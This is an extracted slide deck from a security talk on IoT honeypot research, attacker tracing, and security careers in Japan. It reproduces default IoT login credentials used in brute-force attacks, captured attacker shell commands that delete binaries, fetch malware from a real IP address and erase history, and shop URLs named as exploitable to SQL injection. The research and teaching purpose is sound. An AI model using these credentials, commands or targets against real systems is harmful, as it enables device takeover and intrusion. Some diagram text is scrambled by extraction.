Tracing the Hacker

Dr. Yin Minn Pa Pa

2017/12/30
Yangon Technological University
Why do they HACK?

Financial Value Political Value

 Today’s Talk
1.IoTPOT - IoT Honeypot & Sandbox

2.Fake Organizational Sandbox

3.Security Jobs & Study in Japan

Monitoring Attacks
Attacks
IoT devices?
 Wanna know….
Targets Monetization
Malware

• How many families? • How many different types of • How do hackers

• How fast malware evolve? devices are targeted? make money?
• Botnet or Worm? • Is a particular device targeted?
• Different CPU architecture?
IoTPOT - IoT Honeypot & Sandbox
 Honeypot Sandbox
IoT devices listening on Telnet IoT Malware of different CPU Architecture

ARM MIPSEL

SUPERH

PPC
X86

MIPS

9
 IoTPOT: IoT Honeypot & Sandbox
Internet
Scan

Downloader
Profiles

Telnet
Front end
Front end
Responder Banners
Front end
Responder
Responder Profiler
Front end Authentication
Responder Command
Interaction

Manager Unknown
Commands Learnt command
Sandbox interactions

Multiple CPU
Architectures
 Attack Flow
Malware DL server
C&C
Server

Malware (binary)
Malware (shell)

Hacker or
already 3. Download 4. Attack command
infected IoT Malware
2. Series of Telnet
Commands

Scan 23/TCP
1. Brute force login
attempts
DoS

11
No Video and Photo Please ……
 Widely Used Login Trials
user user root ipcam_rt5350
root default root 3
root root root anko
guest 123456 root vertex25ektks123
root vizxv admin changeme
admin 1234 admin ho4uku6at
admin admin root 33333
support support root ttnet
root default
telecomadmin nE7jA%5m root zlxx.
admin daemon
root xc3511 guest 12345
root antslq root 5up
root 1001chin admin atlantis
Censored
root admin admin Ait
root 123456 naadmin naadmin
root 12345 guest guest
admin password Administrator admin
1234 1234 root t0talc0ntr0l4!
root 12341234 root 7ujMko0vizxv
root changeme admin TRUE
admin CenturyL1nk admin QwestM0dem
root 123123 volition volition
admin nCwMnJVGag admin admin1234
root password support
admin aquario root 33333333
root hunt5759 root xmhdipc
admin pass administrator changeme
 ID/ Password Patterns (Intrusion)
Pattern Name Challenge Order Username/Pass
root/root
root/admin
Fixed Order root/1234

Fixed Order root/12345

root/123456
1 root/1111
root/password
root/dreambox
root/root
Random Order root/admin

Random Order root/12345

root/123456
1 admin/root
…
admin/admin
admin/362729
admin/m4f6h3
Fixed Order Fixed Order admin/n3wporra
admin/263297
2 admin/fdpm0r
admin/1234
root/1234
…

root/xc3511
Random Order root/123456
Random Order root/12345
2 root/root
…

guest/guest
guest/12345
admin/
root/root
Fixed Order root/admin

Fixed Order root/

root/1234
3 root/123456
root/1111
root/password
root/dreambox
root/vizxv

root/root
Random Order root/toor
Random Order root/admin
3 root/user
….
 Example of Command
1. Remove Various Existing Commands (ELF) and Files
• /bin/busybox rm -rf /usr/bin/killall /usr/bin/wget /usr/bin/tftp
/usr/bin/ftpget /bin/rm /bin/ps /bin/ls /bin/netstat /bin/kill /
bin/cp /bin/mv /bin/wget /bin/killall /bin/reboot >/dev/null
2>&1; /bin/busybox ZORRO
• /bin/busybox rm -rf /var/run/* /dev/* >/dev/null 2>&1; /bin/
busybox ZORRO
2. Prepare customized shell
• /bin/busybox mkdir -p /home/app; /bin/busybox ZORRO
/bin/busybox cp -f /bin/sh /home/app/ygr && /bin/busybox
ZORRO
• /bin/busybox echo -ne \\x7F\\x45\\x4C\\x46\\x1\\x1\\x1\\x61\\x0\
\x0\\x0\\x0\\x0\\x0\\x0\\x0\\x2\\x0\\x28\\x0\\x1\\x0\\x0\\x0\\x94\
\x80\\x0\\x0\\x34\\x0\\x0\\x0\\x20\\xE\\x0\\x0\\x2\\x0\\x0\\x0\
\x34\\x0\\x20\\x0\\x3\\x0\\x28\\x0\\x5\\x0\\x4\\\x0\\x0\\x0\\xE
>> /home/app/ygr && /bin/busybox ZORRO .....
15
 Example of Command
3. Download malware binary using attacker’s own shell
• /home/app/ygr
YESHELLO
• /home/app/ygr 37.220.109.5 61050 37.220.109.5 /
wb.arm /home/app/MbgcuEv
YESHELLO
4. Execute downloaded binary and Remove Record
• /bin/busybox echo -ne '' > /home/app/ygr; /bin/
busybox rm -rf /home/app/ygr; / .bin/busybox ZORRO
• /home/app/MbgcuEv
YESHELLO
• rm -rf $HOME/.*history
Commands Patterns (Infection)
Commands Patterns (Infection)
Demo
 Downloaded Malware by Honeypot
• During 81 days of operations [ April 01 to June 20- 2015]

200,000

180581

481,521 Malware Download Attempts

150,000

130314
Host Count

100,000

79935

50,000

0
Visit Login Download Malware
Malware / Monetization
Intrusion
Infection Binaries Monetization

ID/
ID/ Pass
Pass
ID/ Pass Command
Command
Pattern
ID/ Pass Command Malware
Malware Attacks
Pattern
ID/ Pass
Pattern Pattern
Command Malware Attacks
Pattern Pattern
Pattern Malware Attacks
Pattern Pattern Malware Attacks
 Intrusion Infection Downloaded Monetization
2015/01
2015/01 to 2015/04 ZORRO 1
2015/02
2015/01
Binaries Bin 1
ARM

Fixed 8 Architectures
ZORRO 2
Order 1 2015/04 2015/04 Bin 1Bin
Bin 1Bin 1 Bin
1 Bin 1
ZORRO ZORRO 3 2-9
2015/06 8 Architectures
Family Fixed
2015/06 2015/06 BinBin
1 Bin
1 Bin
1 B Bin
1in 1
ZORRO 4 68-75
Order 3 2015/06 7 Architectures
BinBin
1Bin
1 Bin Bin
1 B 1in 1
76-82 DoS
2014/11 to 2015/06 7 Architectures
GAYFGT 1 2014/11
Bin 1Bin
Bin 1 Bin 1 Bin
1 Bin 1
2015/02 10-16
8 Architectures
BinBin
1Bin
1 Bin 1 Bin
1 Bin 1
2014/11 to 2015/06 17-24
2015/04

Some binaries are now obfuscated

Random 8 Architectures
Order 1 BinBin1Bin
1 Bin 1 Bin
1 Bin 1
2015/05 25-32
9 Architectures
GAYFGT BinBin
1Bin
1 Bin
1 Bin
1 1 Bin

Family
2015/06 33-41
8 Architectures Telnet
BinBin
1Bin1 Bin 1 Bin
1 Bin 1
55-62 Scan
5 Architectures
2015/06 BinBin
1Bin
1 Bin 1 Bin
1 Bin 1
2015/06 63-67
GAYFGT 2 2015/06 5 Architectures
BinBin
1Bin
1 Bin 1 Bin
1 Bin
2015/06 1
83-87
6 Architectures
BinBin
1Bin
1 Bin Bin
1 Bin
1 1
88-93 TCP (port
2015/06
No 2015/06 2015/06 BinBin
1Bin
1 Bin
5 Architectures
Bin
80,8080,5
1 Bin
1 1
Authentication *.sh - 1
2015/06
45-49
5 Architectures
916) Scan
2015/06
BinBin1Bin
1 Bin 1 Bin
1 Bin 1
*.sh Family Only One Time 2015/06 50-54
Authentication 5 Architectures

2015/06
BinBin
1Bin
1 Bin 1 Bin
1 Bin 1
94-98
UDP (port
Random
Order 3
2015/06 8 Architectures
123, 3143)
BinBin
1Bin
1 Bin 1 Bin
1 Bin
2015/04
1
99-106
MIPS
Scan
2015/04 2015/04
nttpd Fixed Nttpd 1 Bin 42
2015/05 MIPS
Family Order 2
Nttpd 2
2015/05
Bin 44
2015/04 MIPS
Fake Web
KOS Family Random
Order 2
2015/04
KOS
2015/04
Bin 43 Hosting
From Research

IoT Devices

Scan Other Devices

Other IoT
devices

DoS
 Targeted IoT devices
LED display control system Solid Stage Recorder
Data Acquisition Server

Wireless Router GSM Router

TV Receiver

IP Phone
56 different types
Parking Management System
VoIP Telephony System Fire Alarm

Security Appliance
Internet Communication Module
Video Broadcaster
 Categorizing Device Types
• Surveillance Group
– IP Camera
– DVR
• Networking Related Devices
– Router
– Gateway
– Modem
– Bridge
– Security Appliance
• Telephone System
– VoIP Gateway
– IP Phone
– GSM Router
– Analog Phone Adapter
• Infrastructure
– Parking Management System
– LED display control system
• ICS
– Solid State Recorder
– Internet Communication Module
– Data Acquisition Server
• Personal
– Web Camera
– Personal Video Recorder
– Home Automation Gateway
• Broadcasting Facility
– Digital Video Broadcaster
– Digital Video Scaler
– Video Encoder/Decoder
– Set Top Box
• Other
– Heat Pump
– Fire Alarm System
– Disk Recording System
– Optical Imaging Facility
 Best Practices
• Never use default passwords
• Printers
• Network attached storage
• Cameras
• Check before buy
• Update firmware
• Block port not used
• Block remote access
Fake Organizational Sandbox
 General Attack to Organizations

Command & Control Server Data/ Escalation

4
1
3
lateral
2

Backdoor
 STARDUST - NICT
Attacker

Real Network B
Real Network A Real Network C

Parallel Network B

Parallel Network A Parallel Network C

Fake Organizational Sandbox
Fake Organizational Sandbox
 C&C CONNECTION
XXX. XXX

XXX. XXX

XXX. XXX

STARDUST XXX. XXX

His place?
 YOUSSEF’s activity

PayPal Proxy
ID/Password IP/Port

Censored

Access Token
No Photo/ No Video please !
Activities of YOUSSEF

Censored
 Downloaded files by
YOUSSEF
• SQL Injection Tool

• VPN Tool

• Proxy Tool

• PayPal Drive2.0

• etc
 SQLi ask v.8.0

• Exploitable URL (Japan)

• www.reddshop.com/product_listing.php/catid=4

• Censored
www.bagelbagel.jp/shop/index.php?id=5

• www.pinoy-market.com/store.php?id=136
 Best Practices
• People
• Never click attachments of unknown mail
• Never access unknown website
• Never use usb (or) check before use
• Use strong passwords / regularly update passwords
• Never Share what is unknown
Never believe what is not sure
• Training
• Technology
• Network
• Firewall and gateway antivirus
• IPS/ IDS
• End point security
• Process
• Incident response manual
Security Jobs
 Security Job Titles
• Employers
• Government
• Fortune 500s (finance)
• Tech Vendors
• Big Consulting
• Types
• Full Time
• Contract
• Average Salary (JP)
• Graduate Entry Level - 25 ~ 35

• Middle Level - 40 ~ 60
• Advance Level - 100 ~ 1000
 IT to Security
System Engineer
(Security)

Application Security Security Tester

OS/ Malware Analyst

Android Web app
Malware
Developer (Static)
Programming Researcher
Mobile DB

Pentester

Consultant

Forensic Engineer
 IT to Security
System Engineer
(Security)

Security Tester
Network Security
Linux Malware Analyst
Networking Wireless
Malware
System Cloud
(Dynamic) Researcher
Admin
Monitoring

Pentester

Consultant

Forensic Engineer
 IT to Security
System Engineer
(Security)

IoT Security Security Tester

Malware Analyst

Embedded Protocol Malware

Devices
Industrial Hardware Researcher
Robot Control System

Car
Pentester

Consultant

Forensic Engineer
 IT to Security
System Engineer
(Security)

Security Tester
Self Study
Malware Analyst

CTF Wargame
Game Researcher

Pentester

Consultant

Forensic Engineer
 Study in Japan
Private Sector

Scholarships University Job

Public Sector

Graduate in
Myanmar

Japanese OJT
Company

Scholarships

Study
Japanese University

Job
Part time

SEMON
 Last
• Smart Enough

• Kind Enough

• Care Enough
Q&A
 Hacker Hacker Attacker?

Bad person
Good person + Tech Bad person + Tech